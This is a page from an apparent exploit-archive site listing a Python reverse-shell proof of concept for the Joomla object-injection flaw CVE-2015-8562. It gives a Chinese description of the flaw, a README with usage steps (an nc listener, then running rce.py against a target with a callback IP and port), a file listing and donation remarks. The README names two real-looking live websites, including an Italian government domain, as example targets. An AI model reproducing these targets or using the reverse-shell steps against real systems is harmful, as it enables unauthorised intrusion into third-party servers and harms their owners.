CVE-2015-8562 PoC — Joomla! Core 远程代码执行漏洞

Source

https://github.com/paralelo14/CVE-2015-8562

Associated Vulnerability

Title:Joomla! Core 远程代码执行漏洞 (CVE-2015-8562)
Description:Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。 Joomla!中存在安全漏洞。远程攻击者可借助HTTP User-Agent头利用该漏洞实施PHP对象注入攻击，执行任意PHP代码。以下版本受到影响：Joomla! 1.5.x版本，2.x版本，3.4.6之前3.x版本。（在2015年12月广泛利用）

Description

Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header

Readme

# CVE-2015-8562 - Reverse shell python

Exploit: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header:

    Vuln Date: 12/17/2015
    Exploit Author: anarc0der
    Version: Joomla 1.5 to 3.4.5
    CVE : CVE-2015-8562

How to:
    
    Open one terminal and listen with nc: $ nc -lnvp 4444
    Open another terminal and execute the exploit:
    python3 rce.py --target='target' --ip='ip' --port=4444
    
Targets examples PoC (Do not fuck them, to other people use as exemple):
    
    http://www.monitoraggiograduatorie.gov.it/
    http://budo-aykac.nl/

File Snapshot


 [4.0K]  /data/pocs/9d627158e879b935a85858079b5da6cc81575bc4
├── [6.3K]  rce.py
└── [ 565]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!